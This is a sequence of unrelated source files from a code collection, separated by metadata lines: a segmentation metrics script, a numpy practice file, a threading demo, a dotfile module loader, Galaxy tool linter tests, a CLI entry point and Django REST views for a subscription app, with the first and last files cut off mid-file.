ISBI 2012 if cfg['DATASET'] == "ISBI2012": label = 1 - label pred = 1 - pred y_scores, y_true = pred, label # Area under the ROC curve # pdb.set_trace() fpr, tpr, thresholds = roc_curve((y_true), y_scores) AUC_ROC = roc_auc_score(y_true, y_scores) # test_integral = np.trapz(tpr,fpr) #trapz is numpy integration # print ("\nArea under the ROC curve: " +str(AUC_ROC)) # 
ap_score = average_precision_score(y_true, y_scores) # Precision-recall curve precision, recall, thresholds = precision_recall_curve(y_true, y_scores) precision = np.fliplr([precision])[0] # so the array is increasing (you won't get negative AUC) recall = np.fliplr([recall])[0] # so the array is increasing (you won't get negative AUC) AUC_prec_rec = np.trapz(precision, recall) # print ("\nArea under Precision-Recall curve: " +str(AUC_prec_rec)) # Confusion matrix threshold_confusion = 0.5 # print ("\nConfusion matrix: Custom threshold (for positive) of " +str(threshold_confusion)) y_pred = np.empty((y_scores.shape[0])) for i in range(y_scores.shape[0]): if y_scores[i] >= threshold_confusion: y_pred[i] = 1 else: y_pred[i] = 0 confusion = confusion_matrix(y_true, y_pred) # print (confusion) accuracy = 0 if float(np.sum(confusion)) != 0: accuracy = float(confusion[0, 0] + confusion[1, 1]) / float(np.sum(confusion)) # print ("Global Accuracy: " +str(accuracy)) specificity = 0 if float(confusion[0, 0] + confusion[0, 1]) != 0: specificity = float(confusion[0, 0]) / float(confusion[0, 0] + confusion[0, 1]) # print ("Specificity: " +str(specificity)) sensitivity = 0 if float(confusion[1, 1] + confusion[1, 0]) != 0: sensitivity = float(confusion[1, 1]) / float(confusion[1, 1] + confusion[1, 0]) # print ("Sensitivity: " +str(sensitivity)) precision = 0 if float(confusion[1, 1] + confusion[0, 1]) != 0: precision = float(confusion[1, 1]) / float(confusion[1, 1] + confusion[0, 1]) # print ("Precision: " +str(precision)) # Jaccard similarity index # jaccard_index = jaccard_similarity_score(y_true, y_pred, normalize=True) # print ("\nJaccard similarity score: " +str(jaccard_index)) # F1 score F1_score = f1_score(y_true, y_pred, average='binary') # print ("\nF1 score (F-measure): " +str(F1_score)) # print(1) # print(classification_report(label, pred, target_names=["class 0", "class 1"])) f1m.append(F1_score) accm.append(accuracy) aucm.append(AUC_ROC) 
specificitym.append(specificity) precisionm.append(precision) sensitivitym.append(sensitivity) # print("Your score of new data is {}".format(np.array(f1m).mean())) return np.array(f1m).mean(), np.array(accm).mean(), np.array(aucm).mean(), np.array(specificitym).mean(), np.array( precisionm).mean(), np.array(sensitivitym).mean() if __name__ == "__main__": args = parse_args() f = open(args.cfg_file) cfg = yaml.load(f) # pdb.set_trace() f1, acc, auc, specificity, precision, sensitivity = metrics(label_path=cfg['TEST_LABEL_PATH'], prediction_path=cfg['TEST_PRED_PATH'], cfg=cfg) print("f1", f1, "accuracy", acc, "auc", auc, "specificity", specificity, "precision", precision, "sensitivity", sensitivity) # ====== Evaluate the results
en
0.611579
# scikit learn calculate metrics for entire retinal vessel images. :param foreground: pixel value 255 is foreground. # pdb.set_trace() # label[label <= 128] = 0 # label[label > 128] = 1 # pdb.set_trace() # check the pixel value # pdb.set_trace() # test another datasets ISBI 2012 # Area under the ROC curve # pdb.set_trace() # test_integral = np.trapz(tpr,fpr) #trapz is numpy integration # print ("\nArea under the ROC curve: " +str(AUC_ROC)) # ap_score = average_precision_score(y_true, y_scores) # Precision-recall curve # so the array is increasing (you won't get negative AUC) # so the array is increasing (you won't get negative AUC) # print ("\nArea under Precision-Recall curve: " +str(AUC_prec_rec)) # Confusion matrix # print ("\nConfusion matrix: Custom threshold (for positive) of " +str(threshold_confusion)) # print (confusion) # print ("Global Accuracy: " +str(accuracy)) # print ("Specificity: " +str(specificity)) # print ("Sensitivity: " +str(sensitivity)) # print ("Precision: " +str(precision)) # Jaccard similarity index # jaccard_index = jaccard_similarity_score(y_true, y_pred, normalize=True) # print ("\nJaccard similarity score: " +str(jaccard_index)) # F1 score # print ("\nF1 score (F-measure): " +str(F1_score)) # print(1) # print(classification_report(label, pred, target_names=["class 0", "class 1"])) # print("Your score of new data is {}".format(np.array(f1m).mean())) # pdb.set_trace() # ====== Evaluate the results
2.434173
2
numpy_summation.py
khinthandarkyaw98/Python_Practice
0
6629001
# add() is done between two elements : return an array # sum([]) happens over n elements : return an element import numpy as np arr1 = np.array([1, 2, 3]) arr2 = np.array([4, 5, 6]) newarr = np.add(arr1, arr2) print("add():", newarr) newarr = np.sum([arr1, arr2]) # note that sum([]) print("sum(): ", newarr) # Summation over an axis newarr = np.sum([arr1, arr2], axis = 1) print("sum() over an axis", newarr) # cummulative sum : partially adding the elements in array # The partial sum of [1, 2, 3, 4] would be [1, 1+2, 1+2+3, 1+2+3+4] = [1, 3, 6, 10] # cumsum() # import numpy as np arr = np.array([1, 2, 3]) print("cummulative Sum: ", np.cumsum(arr))
# add() is done between two elements : return an array # sum([]) happens over n elements : return an element import numpy as np arr1 = np.array([1, 2, 3]) arr2 = np.array([4, 5, 6]) newarr = np.add(arr1, arr2) print("add():", newarr) newarr = np.sum([arr1, arr2]) # note that sum([]) print("sum(): ", newarr) # Summation over an axis newarr = np.sum([arr1, arr2], axis = 1) print("sum() over an axis", newarr) # cummulative sum : partially adding the elements in array # The partial sum of [1, 2, 3, 4] would be [1, 1+2, 1+2+3, 1+2+3+4] = [1, 3, 6, 10] # cumsum() # import numpy as np arr = np.array([1, 2, 3]) print("cummulative Sum: ", np.cumsum(arr))
en
0.741707
# add() is done between two elements : return an array # sum([]) happens over n elements : return an element # note that sum([]) # Summation over an axis # cummulative sum : partially adding the elements in array # The partial sum of [1, 2, 3, 4] would be [1, 1+2, 1+2+3, 1+2+3+4] = [1, 3, 6, 10] # cumsum() # import numpy as np
4.294552
4
tests/threading_demo.py
liunx/vimusic
0
6629002
#!/usr/bin/env python3 import threading import queue import time def worker(q): """thread worker function""" while True: if not q.empty(): item = q.get_nowait() print(item) q.task_done() if item == 99: break time.sleep(0.001) if __name__ == "__main__": q = queue.Queue() t = threading.Thread(target=worker, args=(q,)) t.start() for i in range(10): q.put([1,2,3]) time.sleep(1) q.put(99)
#!/usr/bin/env python3 import threading import queue import time def worker(q): """thread worker function""" while True: if not q.empty(): item = q.get_nowait() print(item) q.task_done() if item == 99: break time.sleep(0.001) if __name__ == "__main__": q = queue.Queue() t = threading.Thread(target=worker, args=(q,)) t.start() for i in range(10): q.put([1,2,3]) time.sleep(1) q.put(99)
en
0.315547
#!/usr/bin/env python3 thread worker function
3.406824
3
dotmodules/modules/modules.py
dotmodules/dm
0
6629003
from collections import OrderedDict from dataclasses import dataclass from enum import Enum from pathlib import Path from typing import Dict, Generator, List, Sequence from dotmodules.modules.hooks import ( Hook, LinkCleanUpHook, LinkDeploymentHook, ShellScriptHook, ) from dotmodules.modules.links import LinkItem from dotmodules.modules.loader import ConfigLoader, LoaderError from dotmodules.modules.parser import ( ConfigParser, HookItemDict, LinkItemDict, ParserError, ) from dotmodules.modules.path import PathManager class ModuleError(Exception): """ Exception that will be raised on module level errors. """ class ModuleStatus(str, Enum): DISABLED: str = "disabled" DEPLOYED: str = "deployed" PENDING: str = "pending" ERROR: str = "error" @dataclass class Module: root: Path name: str version: str enabled: bool documentation: Sequence[str] variables: Dict[str, List[str]] links: Sequence[LinkItem] hooks: Sequence[Hook] @classmethod def from_path(cls, path: Path) -> "Module": module_root = path.parent.resolve() try: loader = ConfigLoader.get_loader_for_config_file(config_file_path=path) parser = ConfigParser(loader=loader) name = parser.parse_name() version = parser.parse_version() enabled = parser.parse_enabled() documentation = parser.parse_documentation() variables = parser.parse_variables() link_items = parser.parse_links() hook_items = parser.parse_hooks() links = cls._create_links(link_items=link_items) hooks = cls._create_hooks(hook_items=hook_items) cls._validate_hooks(hooks=hooks) if links: hooks += cls._create_default_link_hooks(links=links) except LoaderError as e: raise ModuleError(f"Configuration loading error: {e}") from e except ParserError as e: raise ModuleError(f"Configuration syntax error: {e}") from e except Exception as e: raise ModuleError( f"Unexpected error happened during module loading: {e}" ) from e module = cls( name=name, version=version, enabled=enabled, documentation=documentation, variables=variables, root=module_root, links=links, 
hooks=hooks, ) return module @staticmethod def _create_links(link_items: List[LinkItemDict]) -> List[LinkItem]: links = [] for link_item in link_items: link = LinkItem( path_to_target=link_item["path_to_target"], path_to_symlink=link_item["path_to_symlink"], name=link_item["name"], ) links.append(link) return links @staticmethod def _create_hooks( hook_items: List[HookItemDict], ) -> List[ShellScriptHook | LinkDeploymentHook | LinkCleanUpHook]: hooks: List[ShellScriptHook | LinkDeploymentHook | LinkCleanUpHook] = [] for hook_item in hook_items: hook = ShellScriptHook( path_to_script=hook_item["path_to_script"], priority=hook_item["priority"], name=hook_item["name"], ) hooks.append(hook) return hooks @staticmethod def _validate_hooks( hooks: List[ShellScriptHook | LinkDeploymentHook | LinkCleanUpHook], ) -> None: for index, _hook in enumerate(hooks, start=1): hook_name = _hook.hook_name if hook_name in [LinkDeploymentHook.NAME, LinkCleanUpHook.NAME]: raise ParserError( f"Cannot use reserved hook name '{hook_name}' in section " f"'hooks' at index {index}!" 
) @staticmethod def _create_default_link_hooks( links: List[LinkItem], ) -> List[ShellScriptHook | LinkDeploymentHook | LinkCleanUpHook]: return [ LinkDeploymentHook(links=links), LinkCleanUpHook(links=links), ] @property def status(self) -> ModuleStatus: if self.errors: return ModuleStatus.ERROR if not self.enabled: return ModuleStatus.DISABLED path_manager = PathManager(root_path=self.root) if all( [ link.check_if_link_exists(path_manager=path_manager) and link.check_if_target_matched(path_manager=path_manager) for link in self.links ] ): return ModuleStatus.DEPLOYED return ModuleStatus.PENDING @property def errors(self) -> List[str]: path_manager = PathManager(root_path=self.root) errors = [] for link in self.links: errors += link.report_errors(path_manager=path_manager) for hook in self.hooks: errors += hook.report_errors(path_manager=path_manager) return errors @dataclass class HookAggregate: module: Module hook: Hook class Modules: """ Aggregation class that contains the loaded modules. It provides an interface to load the modules, and to collect the aggregated variables and hooks from them. """ def __init__(self) -> None: self.modules: List[Module] = [] def __len__(self) -> int: return len(self.modules) @staticmethod def _config_file_paths( modules_root_path: Path, config_file_name: str ) -> Generator[Path, None, None]: return Path(modules_root_path).rglob(config_file_name) @classmethod def load(cls, modules_root_path: Path, config_file_name: str) -> "Modules": modules = cls() config_file_paths = cls._config_file_paths( modules_root_path=modules_root_path, config_file_name=config_file_name ) for config_file_path in config_file_paths: try: module = Module.from_path(path=config_file_path) except ModuleError as e: raise ModuleError( f"Error while loading module at path '{config_file_path}': {e}" ) from e modules.modules.append(module) # Sorting the modules in alphabetical path order. 
modules.modules.sort(key=lambda m: str(m.root)) return modules @property def variables(self) -> Dict[str, List[str]]: vars = {} for module in self.modules: if not module.enabled: continue for name, values in module.variables.items(): if name not in vars: vars[name] = list(values) else: for value in values: if value not in vars[name]: vars[name] += values vars[name].sort() return vars @property def hooks(self) -> OrderedDict[str, List[HookAggregate]]: hooks: OrderedDict[str, List[HookAggregate]] = OrderedDict() for module in self.modules: if not module.enabled: continue for hook in module.hooks: hook_name = hook.hook_name if hook_name not in hooks: hooks[hook_name] = [] hooks[hook_name].append(HookAggregate(module=module, hook=hook)) for _, values in hooks.items(): values.sort(key=lambda item: item.hook.hook_priority) return hooks
from collections import OrderedDict from dataclasses import dataclass from enum import Enum from pathlib import Path from typing import Dict, Generator, List, Sequence from dotmodules.modules.hooks import ( Hook, LinkCleanUpHook, LinkDeploymentHook, ShellScriptHook, ) from dotmodules.modules.links import LinkItem from dotmodules.modules.loader import ConfigLoader, LoaderError from dotmodules.modules.parser import ( ConfigParser, HookItemDict, LinkItemDict, ParserError, ) from dotmodules.modules.path import PathManager class ModuleError(Exception): """ Exception that will be raised on module level errors. """ class ModuleStatus(str, Enum): DISABLED: str = "disabled" DEPLOYED: str = "deployed" PENDING: str = "pending" ERROR: str = "error" @dataclass class Module: root: Path name: str version: str enabled: bool documentation: Sequence[str] variables: Dict[str, List[str]] links: Sequence[LinkItem] hooks: Sequence[Hook] @classmethod def from_path(cls, path: Path) -> "Module": module_root = path.parent.resolve() try: loader = ConfigLoader.get_loader_for_config_file(config_file_path=path) parser = ConfigParser(loader=loader) name = parser.parse_name() version = parser.parse_version() enabled = parser.parse_enabled() documentation = parser.parse_documentation() variables = parser.parse_variables() link_items = parser.parse_links() hook_items = parser.parse_hooks() links = cls._create_links(link_items=link_items) hooks = cls._create_hooks(hook_items=hook_items) cls._validate_hooks(hooks=hooks) if links: hooks += cls._create_default_link_hooks(links=links) except LoaderError as e: raise ModuleError(f"Configuration loading error: {e}") from e except ParserError as e: raise ModuleError(f"Configuration syntax error: {e}") from e except Exception as e: raise ModuleError( f"Unexpected error happened during module loading: {e}" ) from e module = cls( name=name, version=version, enabled=enabled, documentation=documentation, variables=variables, root=module_root, links=links, 
hooks=hooks, ) return module @staticmethod def _create_links(link_items: List[LinkItemDict]) -> List[LinkItem]: links = [] for link_item in link_items: link = LinkItem( path_to_target=link_item["path_to_target"], path_to_symlink=link_item["path_to_symlink"], name=link_item["name"], ) links.append(link) return links @staticmethod def _create_hooks( hook_items: List[HookItemDict], ) -> List[ShellScriptHook | LinkDeploymentHook | LinkCleanUpHook]: hooks: List[ShellScriptHook | LinkDeploymentHook | LinkCleanUpHook] = [] for hook_item in hook_items: hook = ShellScriptHook( path_to_script=hook_item["path_to_script"], priority=hook_item["priority"], name=hook_item["name"], ) hooks.append(hook) return hooks @staticmethod def _validate_hooks( hooks: List[ShellScriptHook | LinkDeploymentHook | LinkCleanUpHook], ) -> None: for index, _hook in enumerate(hooks, start=1): hook_name = _hook.hook_name if hook_name in [LinkDeploymentHook.NAME, LinkCleanUpHook.NAME]: raise ParserError( f"Cannot use reserved hook name '{hook_name}' in section " f"'hooks' at index {index}!" 
) @staticmethod def _create_default_link_hooks( links: List[LinkItem], ) -> List[ShellScriptHook | LinkDeploymentHook | LinkCleanUpHook]: return [ LinkDeploymentHook(links=links), LinkCleanUpHook(links=links), ] @property def status(self) -> ModuleStatus: if self.errors: return ModuleStatus.ERROR if not self.enabled: return ModuleStatus.DISABLED path_manager = PathManager(root_path=self.root) if all( [ link.check_if_link_exists(path_manager=path_manager) and link.check_if_target_matched(path_manager=path_manager) for link in self.links ] ): return ModuleStatus.DEPLOYED return ModuleStatus.PENDING @property def errors(self) -> List[str]: path_manager = PathManager(root_path=self.root) errors = [] for link in self.links: errors += link.report_errors(path_manager=path_manager) for hook in self.hooks: errors += hook.report_errors(path_manager=path_manager) return errors @dataclass class HookAggregate: module: Module hook: Hook class Modules: """ Aggregation class that contains the loaded modules. It provides an interface to load the modules, and to collect the aggregated variables and hooks from them. """ def __init__(self) -> None: self.modules: List[Module] = [] def __len__(self) -> int: return len(self.modules) @staticmethod def _config_file_paths( modules_root_path: Path, config_file_name: str ) -> Generator[Path, None, None]: return Path(modules_root_path).rglob(config_file_name) @classmethod def load(cls, modules_root_path: Path, config_file_name: str) -> "Modules": modules = cls() config_file_paths = cls._config_file_paths( modules_root_path=modules_root_path, config_file_name=config_file_name ) for config_file_path in config_file_paths: try: module = Module.from_path(path=config_file_path) except ModuleError as e: raise ModuleError( f"Error while loading module at path '{config_file_path}': {e}" ) from e modules.modules.append(module) # Sorting the modules in alphabetical path order. 
modules.modules.sort(key=lambda m: str(m.root)) return modules @property def variables(self) -> Dict[str, List[str]]: vars = {} for module in self.modules: if not module.enabled: continue for name, values in module.variables.items(): if name not in vars: vars[name] = list(values) else: for value in values: if value not in vars[name]: vars[name] += values vars[name].sort() return vars @property def hooks(self) -> OrderedDict[str, List[HookAggregate]]: hooks: OrderedDict[str, List[HookAggregate]] = OrderedDict() for module in self.modules: if not module.enabled: continue for hook in module.hooks: hook_name = hook.hook_name if hook_name not in hooks: hooks[hook_name] = [] hooks[hook_name].append(HookAggregate(module=module, hook=hook)) for _, values in hooks.items(): values.sort(key=lambda item: item.hook.hook_priority) return hooks
en
0.831445
Exception that will be raised on module level errors. Aggregation class that contains the loaded modules. It provides an interface to load the modules, and to collect the aggregated variables and hooks from them. # Sorting the modules in alphabetical path order.
2.033155
2
backend/app/cli.py
SeanFitzpatrick0/BugKiller
0
6629004
from typing import NoReturn from bug_killer_client_2.cli.builder import generate_cli from bug_killer_client_2.cli.builder import get_cli_defaults from bug_killer_client_2.cli.executor import execute_operation from bug_killer_client_2.service import project, bug from bug_killer_utils.object import get_local_function_in_module def main() -> NoReturn: defaults = get_cli_defaults() operations = get_local_function_in_module(project) + get_local_function_in_module(bug) parser = generate_cli(operations, defaults, 'BugKiller CLI') execute_operation(operations, parser.parse_args()) if __name__ == '__main__': main()
from typing import NoReturn from bug_killer_client_2.cli.builder import generate_cli from bug_killer_client_2.cli.builder import get_cli_defaults from bug_killer_client_2.cli.executor import execute_operation from bug_killer_client_2.service import project, bug from bug_killer_utils.object import get_local_function_in_module def main() -> NoReturn: defaults = get_cli_defaults() operations = get_local_function_in_module(project) + get_local_function_in_module(bug) parser = generate_cli(operations, defaults, 'BugKiller CLI') execute_operation(operations, parser.parse_args()) if __name__ == '__main__': main()
none
1
2.036013
2
test/unit/tool_util/test_tool_linters.py
brinkmanlab/galaxy
0
6629005
import pytest from galaxy.tool_util.lint import LintContext from galaxy.tool_util.linters import inputs from galaxy.util import etree NO_SECTIONS_XML = """ <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> </tool> """ NO_WHEN_IN_CONDITIONAL_XML = """ <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> <inputs> <conditional name="labels"> <param name="label_select" type="select" label="Points to label"> <option value="none" selected="True">None</option> </param> </conditional> </inputs> </tool> """ RADIO_SELECT_INCOMPATIBILITIES = """ <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> <inputs> <param name="radio_select" type="select" display="radio" optional="true" multiple="true"/> </inputs> </tool> """ SELECT_DUPLICATED_OPTIONS = """ <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> <inputs> <param name="select" type="select" optional="true" multiple="true"> <option value="v">x</option> <option value="v">x</option> </param> </inputs> </tool> """ TESTS = [ (NO_SECTIONS_XML, inputs.lint_inputs, lambda x: 'Found no input parameters.' 
in x.warn_messages), (NO_WHEN_IN_CONDITIONAL_XML, inputs.lint_inputs, lambda x: "Conditional [labels] no <when /> block found for select option 'none'" in x.warn_messages), (RADIO_SELECT_INCOMPATIBILITIES, inputs.lint_inputs, lambda x: 'Select [radio_select] display="radio" is incompatible with optional="true"' in x.error_messages and 'Select [radio_select] display="radio" is incompatible with multiple="true"' in x.error_messages), (SELECT_DUPLICATED_OPTIONS, inputs.lint_inputs, lambda x: 'Select [select] has multiple options with the same text content' in x.error_messages and 'Select [select] has multiple options with the same value' in x.error_messages), ] @pytest.mark.parametrize('tool_xml,lint_func,assert_func', TESTS, ids=['Lint no sections', 'lint no when', 'radio select incompatibilities', 'select duplicated options']) def test_tool_xml(tool_xml, lint_func, assert_func): lint_ctx = LintContext('all') tree = etree.ElementTree(element=etree.fromstring(tool_xml)) lint_ctx.lint(name="test_lint", lint_func=lint_func, lint_target=tree) assert assert_func(lint_ctx), f"Warnings: {lint_ctx.warn_messages}\nErrors: {lint_ctx.error_messages}"
import pytest from galaxy.tool_util.lint import LintContext from galaxy.tool_util.linters import inputs from galaxy.util import etree NO_SECTIONS_XML = """ <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> </tool> """ NO_WHEN_IN_CONDITIONAL_XML = """ <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> <inputs> <conditional name="labels"> <param name="label_select" type="select" label="Points to label"> <option value="none" selected="True">None</option> </param> </conditional> </inputs> </tool> """ RADIO_SELECT_INCOMPATIBILITIES = """ <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> <inputs> <param name="radio_select" type="select" display="radio" optional="true" multiple="true"/> </inputs> </tool> """ SELECT_DUPLICATED_OPTIONS = """ <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> <inputs> <param name="select" type="select" optional="true" multiple="true"> <option value="v">x</option> <option value="v">x</option> </param> </inputs> </tool> """ TESTS = [ (NO_SECTIONS_XML, inputs.lint_inputs, lambda x: 'Found no input parameters.' 
in x.warn_messages), (NO_WHEN_IN_CONDITIONAL_XML, inputs.lint_inputs, lambda x: "Conditional [labels] no <when /> block found for select option 'none'" in x.warn_messages), (RADIO_SELECT_INCOMPATIBILITIES, inputs.lint_inputs, lambda x: 'Select [radio_select] display="radio" is incompatible with optional="true"' in x.error_messages and 'Select [radio_select] display="radio" is incompatible with multiple="true"' in x.error_messages), (SELECT_DUPLICATED_OPTIONS, inputs.lint_inputs, lambda x: 'Select [select] has multiple options with the same text content' in x.error_messages and 'Select [select] has multiple options with the same value' in x.error_messages), ] @pytest.mark.parametrize('tool_xml,lint_func,assert_func', TESTS, ids=['Lint no sections', 'lint no when', 'radio select incompatibilities', 'select duplicated options']) def test_tool_xml(tool_xml, lint_func, assert_func): lint_ctx = LintContext('all') tree = etree.ElementTree(element=etree.fromstring(tool_xml)) lint_ctx.lint(name="test_lint", lint_func=lint_func, lint_target=tree) assert assert_func(lint_ctx), f"Warnings: {lint_ctx.warn_messages}\nErrors: {lint_ctx.error_messages}"
en
0.149762
<tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> </tool> <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> <inputs> <conditional name="labels"> <param name="label_select" type="select" label="Points to label"> <option value="none" selected="True">None</option> </param> </conditional> </inputs> </tool> <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> <inputs> <param name="radio_select" type="select" display="radio" optional="true" multiple="true"/> </inputs> </tool> <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> <inputs> <param name="select" type="select" optional="true" multiple="true"> <option value="v">x</option> <option value="v">x</option> </param> </inputs> </tool>
2.008105
2
main/find-pow-a-b-mod-m/find-pow-a-b-mod-m.py
EliahKagan/old-practice-snapshot
0
6629006
<gh_stars>0 for t in xrange(int(raw_input())): a, b, m = map(int, raw_input().split()) print pow(a, b, m)
for t in xrange(int(raw_input())): a, b, m = map(int, raw_input().split()) print pow(a, b, m)
none
1
2.845691
3
src/pylibgen/__init__.py
ABHISHEKVALSAN/python-package-creator
0
6629007
<reponame>ABHISHEKVALSAN/python-package-creator __version__=1.0 #There is no plan for Version Control System, #All the changes will be pushed to version 1.0
__version__=1.0 #There is no plan for Version Control System, #All the changes will be pushed to version 1.0
en
0.796709
#There is no plan for Version Control System, #All the changes will be pushed to version 1.0
1.19271
1
km_api/know_me/views.py
knowmetools/km-api
4
6629008
<reponame>knowmetools/km-api<gh_stars>1-10 """Views for the ``know_me`` module. """ import logging from django.conf import settings from django.db.models import Case, PositiveSmallIntegerField, Q, Value, When from django.http import HttpResponse, HttpRequest from django.shortcuts import get_object_or_404 from dry_rest_permissions.generics import DRYGlobalPermissions, DRYPermissions from rest_framework import generics, pagination, status from rest_framework.permissions import IsAuthenticated from rest_framework.response import Response from know_me import models, permissions, serializers from know_me.serializers import ( subscription_serializers, email_reminder_subscriber_serializers, ) from permission_utils.view_mixins import DocumentActionMixin logger = logging.getLogger(__name__) class AppleReceiptQueryView(generics.CreateAPIView): """ post: Determine if an Apple receipt is already in use. If a valid Apple receipt is passed to the endpoint, the response will contain an `is_used` key indicating if the receipt is in use. If it is in use, the `email` key of the response will contain the primary email address of the owner of the receipt. If the provided receipt is invalid, a 400 response will be returned. """ serializer_class = subscription_serializers.AppleReceiptQuerySerializer def create(self, *args, **kwargs): """ Override the response returned from the parent class' ``create`` method to have a 200 status code. """ response = super().create(*args, **kwargs) response.status_code = status.HTTP_200_OK return response class AppleSubscriptionView(generics.RetrieveDestroyAPIView): """ delete: Delete the Apple receipt associated with the requesting user's Know Me premium subscription. Deleting the receipt will also immediately deactivate the user's premium subscription. get: Retrieve the current user's Apple subscription. If the user does not have an Apple subscription, a 404 response is returned. 
put: Set the Apple subscription for the current user by providing the receipt from Apple for the purchase. """ permission_classes = (DRYPermissions,) serializer_class = subscription_serializers.AppleReceiptSerializer def get_object(self): """ Get the Apple subscription data instance that belongs to the requesting user. Returns: The ``AppleReceipt`` instance that belongs to the requesting user. """ return get_object_or_404( models.AppleReceipt, subscription__user=self.request.user ) def perform_destroy(self, instance): """ Delete the requesting user's Apple receipt and deactivate their premium subscription. Args: instance: The Apple receipt data to delete. """ subscription = instance.subscription subscription.is_active = False subscription.save() instance.delete() logger.info( "Deleted Apple receipt associated with subscription %d", subscription.pk, ) def put(self, request, *args, **kwargs): # If the user has an existing Apple subscription, update it try: instance = models.AppleReceipt.objects.get( subscription__user=self.request.user ) except models.AppleReceipt.DoesNotExist: instance = None # Validate the data provided to the serializer before we create # the base subscription (if necessary). serializer = self.get_serializer(instance, data=request.data) serializer.is_valid(raise_exception=True) subscription, _ = models.Subscription.objects.get_or_create( user=self.request.user, defaults={"is_active": False} ) serializer.save(subscription=subscription) return Response(serializer.data) class AccessorAcceptView(generics.GenericAPIView): """ post: Accept the accessor with the specified ID. Only the user granted access by the accessor may accept it. """ # We use the global permissions check because the normal check # assumes we're checking write permissions for a POST request. 
permission_classes = (DRYGlobalPermissions,) queryset = models.KMUserAccessor.objects.all() # We need a serializer class because dry-rest-permissions uses the # serializer to determine the model used for the view. serializer_class = serializers.KMUserAccessorAcceptSerializer def check_object_permissions(self, request, obj): """ Check permissions on the accessor being accessed. Only the user granted access by the accessor has permission to accept the accessor. Args: request: The request being made. obj: The ``KMUserAccessor`` instance being accepted. """ super().check_object_permissions(request, obj) if not obj.has_object_accept_permission(request): self.permission_denied(request) def post(self, request, *args, **kwargs): accessor = self.get_object() accessor.is_accepted = True accessor.save() return Response(status=status.HTTP_204_NO_CONTENT) class AcceptedAccessorListView(generics.ListAPIView): """ get: Retrieve the accessors granting the requesting user access to other users' accounts that have been accepted. """ permission_classes = (DRYPermissions,) serializer_class = serializers.KMUserAccessorSerializer def get_queryset(self): """ Get the accessors accepted by the requesting user. Returns: A queryset containing the accessors accepted by the requesting user. """ return self.request.user.km_user_accessors.filter(is_accepted=True) class AccessorDetailView( DocumentActionMixin, generics.RetrieveUpdateDestroyAPIView ): """ get: Endpoint for retrieving the details of a specific accessor. put: Endpoint for updating an accessor. patch: Endpoint for partially updating an accessor. delete: Endpoint for deleting a specific accessor. """ permission_classes = (DRYPermissions,) serializer_class = serializers.KMUserAccessorSerializer def get_queryset(self): """ Get the accessors accessible to the requesting user. Returns: A queryset containing the ``KMUserAccessor`` instances belonging to the requesting user. 
""" query = Q(km_user__user=self.request.user) query |= Q(user_with_access=self.request.user) return models.KMUserAccessor.objects.filter(query) class AccessorListView(generics.ListCreateAPIView): """ get: Endpoint for listing the accessors that grant access to the current user's Know Me profiles. *__Note:__ The requesting user must have an active premium subscription to access this view.* post: Endpoint for creating a new accessor for the current user's profiles. *__Note:__ The requesting user must have an active premium subscription to access this view.* """ permission_classes = (DRYPermissions, permissions.HasPremium) serializer_class = serializers.KMUserAccessorSerializer def get_queryset(self): """ Get the accessors for the user with the given PK. Returns: A queryset containing the ``KMUserAccessor`` instances belonging to the Know Me user whose PK was passed to the view. """ km_user = get_object_or_404(models.KMUser, user=self.request.user) return km_user.km_user_accessors.all() def perform_create(self, serializer): """ Create a new accessor for the current user. Args: serializer: The serializer containing the received data. Returns: The newly created ``KMUserAccessor`` instance. """ km_user = get_object_or_404(models.KMUser, user=self.request.user) return serializer.save(km_user=km_user) class ConfigDetailView(generics.RetrieveUpdateAPIView): """ get: Retrieve the configuration for the Know Me app. patch: Partially update the configuration for Know Me. Only staff users may perform this action. put: Update the configuration for Know Me. Only staff users may perform this action. """ permission_classes = (DRYGlobalPermissions,) serializer_class = serializers.ConfigSerializer def get_object(self): """ Return the config instance singleton. 
